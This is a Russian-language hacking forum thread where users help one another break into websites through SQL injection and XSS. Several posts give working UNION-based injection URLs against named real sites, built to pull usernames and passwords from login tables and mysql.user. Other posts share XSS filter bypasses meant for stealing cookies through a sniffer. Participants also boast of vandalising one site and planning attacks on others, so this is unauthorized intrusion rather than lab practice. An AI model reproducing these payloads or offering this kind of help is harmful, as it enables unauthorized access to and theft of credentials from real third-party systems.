Ваши вопросы по уязвимостям.

Code:

http://milw0rm.com/papers/149

прочти, может ето то, что ты искал;-) Ах да, погугли по милворму типа, add new user, insert, update, посмотри примеры в сплоитах.

 

чтото не то =\\

провожу sql иньекцию ..када синтаксис не верен выводит ошибку синтаксиса .. а когда отправляю правильный запрос(с теми изменениями что мне нужны конечно) скрипт плюётся и выводит Invalid query: No database selected

в чём может быть трабл ? когда код без изменений( тоесть без иньекции) то всё норм работает =\\

пс и коментрии страно срабатывают ..

/* - работает только если его потом закрыть

-- работает странно както если сделать

union select 1,2,3,4((1='1 AND (ishidden=0))

он напишет

Code:

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '((1='1') AND (ishidden=0))' at line 1

а если union select 1,2,3,4--((1='1 AND (ishidden=0))

напишет

Code:

Invalid query: Unknown column 'ishidden' in 'field list'

тоесть срабатывает как робел Оо

а # вще не срабатывает =\\

 

Ап

 

Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого

Code:

mysql_select_db('mysql'); 

, а сам sql запрос выглядит например так:

Code:

$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id;

т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана.
2. 5 ветка требует закрытых /* коментов (как mssql) а перед и после -- должны стоять пробелы, и # в ГЕТ запросе нужно заменять на %23

 

где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг

 

Так проще, узнал допустим таблицу:

Code:

_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name,table_schema),7,8,9,10,11+from+information_schema.tables+limit+23,1--

Узнал колонки:

Code:

_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,column_name),7,8,9,10,11+from+information_schema.columns+where+table_name=0x6C6F67696E+limit+0,1--

Достал информацию, которая тебе нужна:

Code:

_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,psw),7,8,9,10,11+from+tgp_gamedb.login+limit+0,1--

А так, читай статьи, юзай SIPT.

 

"><script>alert(document.cookie)</script> получается выполнить.
при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
короч ищи другую xss)

 

Problema so znakom "="

 

Поправлю:
>= MySQL 5.0.51

До этого можно незакрытые

 

The_HuliGun, большое спасибо, на другом форуме мне посоветовали использовать group, но этот более проще, спасибо!
п.с. незаходите теперь на тот сайт, там теперь ну просто кошмар!!! веб-вандализм)))

 

Возможно ли провести xss если фильруется <> скобки фигурные. а остальное нет.

 

Используй String.fromCharCode()

 

так как я использую эту функцию если я пихаю в поле <script>alert()</script> и в исходниках без <>
вот так scriptalert()/script

 

Тогда используй другую кодировку - UTF-7
символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”

 

нубхакер

http://ha.ckers.org/xss.html там снизу есть Character Encoding Calculator
В поле ASCII Text: вставляешь <script>alert('')</script>
Жмешь encode
Дальше содержимое

Decimal Value:
HTML (without semicolons):

Копируешь и подставляешь там где уязвимый параметр

 

это сакс, работает токо в ослике. не факт, что у админа осёл. ЗЫ вопрос. в версии phpbb 2.0.xx в куках лежит хэш пасс?


add// нашол нормальную пасивку, всё теперь буду хекать популярный сайт.

 

народ пытался раскрутить не получается взять )
http://www.***.com/news/news.php?id=2983+union+select+1,2,3,4,5,6,7,8,9/*
http://www.***.com/news/news.php?id=2983+union+select+1,table_name,3,4,5,6,7,8,9+from+information.schema.tables/*
забираю tables:user
подбираю колонки переведя таблицу в sqlhex - password, user
Пытаюсь добыть инфу
http://www.***/news/news.php?id=2983+union+select+1,concat_ws(0x3a,password,user),3,4,5,6,7,8,9+from+user/*
И выходит пустое место где во всех пред случаях работала sql-inj =((( тоесть страница выходит как надо, но место sql пустое (
Вот
http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws%280x3a,password,user%29,3,4,5,6,7,8,9+from+user--

 

2la.painkiller +limit+x,1/* x=0....10000

 

ну так без limit должно выводить первое значение.
Мне больше интересен факт почему так?

пс. с лимит тоже не выводит

 

2la.painkiller

Базу указывать надо. Таблица в другой базе. И статьи читать ПЕРЕД тем как вопросы задавать.

http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9+from+mysql.user/*